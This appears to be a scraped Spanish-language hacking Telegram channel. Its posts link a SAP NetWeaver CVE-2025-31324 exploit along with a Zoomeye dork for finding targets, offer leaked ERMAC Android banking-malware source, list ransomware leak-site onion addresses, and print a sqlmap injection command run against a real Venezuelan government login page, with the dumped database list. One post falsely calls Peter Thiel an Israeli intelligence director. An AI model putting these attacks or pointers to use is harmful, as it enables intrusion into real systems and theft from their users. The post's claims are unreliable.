He estado jugando con un Exploit 0Day muy bonito regalado por los chicos de Scattered Spider alias Lapsus$, los chicos han estado muy activos este mes atacando Burgen King Brazil junto a la policia brasileña y en las ultimas semanas a estado amenazando al CEO de la empresa de ciberseguridad Crowdstrike por tirar informacion de sus servidores.
Recientemente publicaron un Exploit el cual permite subir ficheros al servidor victima sin ningún tipo de restricción, CVE-2025-31324 es el cve para el Exploit, les dejo el Github...
https://github.com/antichainalysis/sap-netweaver-0day-CVE-2025-31324
FUENTE:
https://news.1rj.ru/str/+vs8Sn8tCsrk1ZDk1
#exploit #rce #scattered #lapsus #github
Recientemente publicaron un Exploit el cual permite subir ficheros al servidor victima sin ningún tipo de restricción, CVE-2025-31324 es el cve para el Exploit, les dejo el Github...
https://github.com/antichainalysis/sap-netweaver-0day-CVE-2025-31324
FUENTE:
https://news.1rj.ru/str/+vs8Sn8tCsrk1ZDk1
#exploit #rce #scattered #lapsus #github
❤15👏2
CVE-2025-31324: Unrestricted Upload of File with Dangerous Type 💣
🔴 TIPO: Subida de fichero sin restricción
🔍 DORK (Zoomeye) :
💣 EXPLOIT:
https://github.com/antichainalysis/sap-netweaver-0day-CVE-2025-31324
ℹ️ INFO:
https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2025-31324
UNETE A FSEC INTEL ES 📡
#exploit #uploadexploit
🔴 TIPO: Subida de fichero sin restricción
🔍 DORK (Zoomeye) :
iconhash="b2bd2546ba77fec1f47425679e05f212"
💣 EXPLOIT:
https://github.com/antichainalysis/sap-netweaver-0day-CVE-2025-31324
ℹ️ INFO:
https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2025-31324
UNETE A FSEC INTEL ES 📡
#exploit #uploadexploit
GitHub
GitHub - antichainalysis/sap-netweaver-0day-CVE-2025-31324: sap netweaver 0day poc by shinyhunters (scattered lapsus$ hunters)…
sap netweaver 0day poc by shinyhunters (scattered lapsus$ hunters) affecting all 7.x CVE-2025-31324 - antichainalysis/sap-netweaver-0day-CVE-2025-31324
🔥12❤1
Se Filtra codigo fuente de Malware Bancario para Android 📡
Investigadores de hunt.io dieron con un servidor en el cual lograron obtener toda la infraestructura de ERMAC V30, un Malware Bancario dirigido a Usuario de Android, ERMAC tiene capacidades altamente peligrosas como la de asimilar y superponer mas de 700 aplicaciones bancarias capaz de robar usuarios y contraseñas, también el Malware es capaz de enviar SMS y realizar llamadas telefónicas.
https://hunt.io/blog/ermac-v3-banking-trojan-source-code-leak
https://github.com/vxunderground/MalwareSourceCode/tree/main/Android/Android.Ermac.3
#malware #leak #ermac #android #botnet
Investigadores de hunt.io dieron con un servidor en el cual lograron obtener toda la infraestructura de ERMAC V30, un Malware Bancario dirigido a Usuario de Android, ERMAC tiene capacidades altamente peligrosas como la de asimilar y superponer mas de 700 aplicaciones bancarias capaz de robar usuarios y contraseñas, también el Malware es capaz de enviar SMS y realizar llamadas telefónicas.
https://hunt.io/blog/ermac-v3-banking-trojan-source-code-leak
https://github.com/vxunderground/MalwareSourceCode/tree/main/Android/Android.Ermac.3
#malware #leak #ermac #android #botnet
🔥13🥰4❤1
FSEC INTEL ES 2.0 📡 🏴☠️
Se Filtra codigo fuente de Malware Bancario para Android 📡 Investigadores de hunt.io dieron con un servidor en el cual lograron obtener toda la infraestructura de ERMAC V30, un Malware Bancario dirigido a Usuario de Android, ERMAC tiene capacidades altamente…
Ermac.3_Source.zip
149.6 MB
Password:
#malware #zip
malwareErmac.3_Source
├── Android.Ermac.3.7z
├── Backend.7z
└── Builder.7z
1 directory, 3 files
#malware #zip
❤19❤🔥1👎1
Justicia Penal Militar y Policial Colombia golpeada por Ransomware 45TB exfiltrados 🇨🇴
Organización gubernamental colombiana encargada
de realizar seguimmientos y sanciones contra
faltas de miembros de las fuerzas publicas fue
pirateada por Gunra Ransomware una pandilla
relativamente nueva dentro de la escena del
Ransomware.
Al parecer la pandilla logro exfiltrar una gran
cantidad de ficheros los cuales llegaron a pesar
45TB, tambien se puedo observar otras victimas
latinas como ser: una farmaceutica argentina,
una aseguradora nicaragüense y un Ecommerce
brasileño.
FUENTE:
http://gunrabxbig445sjqa535uaymzerj6fp4nwc6ngc2xughf2pedjdhk4ad.onion/
#colombia #gunra #onion #fuckgob
Organización gubernamental colombiana encargada
de realizar seguimmientos y sanciones contra
faltas de miembros de las fuerzas publicas fue
pirateada por Gunra Ransomware una pandilla
relativamente nueva dentro de la escena del
Ransomware.
Al parecer la pandilla logro exfiltrar una gran
cantidad de ficheros los cuales llegaron a pesar
45TB, tambien se puedo observar otras victimas
latinas como ser: una farmaceutica argentina,
una aseguradora nicaragüense y un Ecommerce
brasileño.
FUENTE:
http://gunrabxbig445sjqa535uaymzerj6fp4nwc6ngc2xughf2pedjdhk4ad.onion/
#colombia #gunra #onion #fuckgob
🔥5
Instituto Nacional de Higiene Venezuela | SQLI VUN 💣 🇻🇪
DBs
#exploit #sqli #fuckgob #venezuela
sqlmap --random-agent --risk=3 --level=5 --tamper=between,space2comment --url "https://siverc.inhrr.gob.ve/user/includes/login_op.php" --data="usuario_login=admin&clave_login=admmin&login=1" --method POST --dbs --delay 5 --batch --threads=10
DBs
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public
#exploit #sqli #fuckgob #venezuela
🔥6❤1👍1
Jeffrey Epstein estaba interesado en la industria del Ciberespionaje según correos filtrados 📡
Una serie de correos filtrados por el grupo Hacktivista propalestina Handala dieron a conocer el interés de Epstein por incursionar en el mundo del espionaje cibernetico, según los correos filtrados el multimillonario se reunió con el exministro israeli Ehud Barak y con Peter Thiel ex Director de Inteligencia de Señales israeli y fundador de Palantir una empresa de minería de datos y desarrollo de Software orientado al análisis de datos.
En los correos también se puede ver como Epstein trataba de entrar en el mundo de la ciberinteligencia tanto en los EEUU y Europa he incluso Rusia, pues como es obvio sus intentos se vieron frustrados gracias a su juicio y posterior asesinato.
FUENTES:
https://handala-hack.to/israel-prime-minister-emails/
https://ddosecrets.com/article/ehud-barak-emails
https://reason.com/2025/08/27/inside-jeffrey-epsteins-spy-industry-connections/
#palantir #epstein #vigilancia
Una serie de correos filtrados por el grupo Hacktivista propalestina Handala dieron a conocer el interés de Epstein por incursionar en el mundo del espionaje cibernetico, según los correos filtrados el multimillonario se reunió con el exministro israeli Ehud Barak y con Peter Thiel ex Director de Inteligencia de Señales israeli y fundador de Palantir una empresa de minería de datos y desarrollo de Software orientado al análisis de datos.
En los correos también se puede ver como Epstein trataba de entrar en el mundo de la ciberinteligencia tanto en los EEUU y Europa he incluso Rusia, pues como es obvio sus intentos se vieron frustrados gracias a su juicio y posterior asesinato.
FUENTES:
https://handala-hack.to/israel-prime-minister-emails/
https://ddosecrets.com/article/ehud-barak-emails
https://reason.com/2025/08/27/inside-jeffrey-epsteins-spy-industry-connections/
#palantir #epstein #vigilancia
❤5🤬1🤨1
Forwarded from club1337
Devman Ransomware Blog is back online
wugurgyscp5rxpihef5vl6b6m5ont3b6sezhl7boboso2enib2k3q6qd[.]onion
Telegram✉️ @club1337
X (Twitter)🕊 @club31337
wugurgyscp5rxpihef5vl6b6m5ont3b6sezhl7boboso2enib2k3q6qd[.]onion
Telegram
X (Twitter)
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Proxy Bar
❤2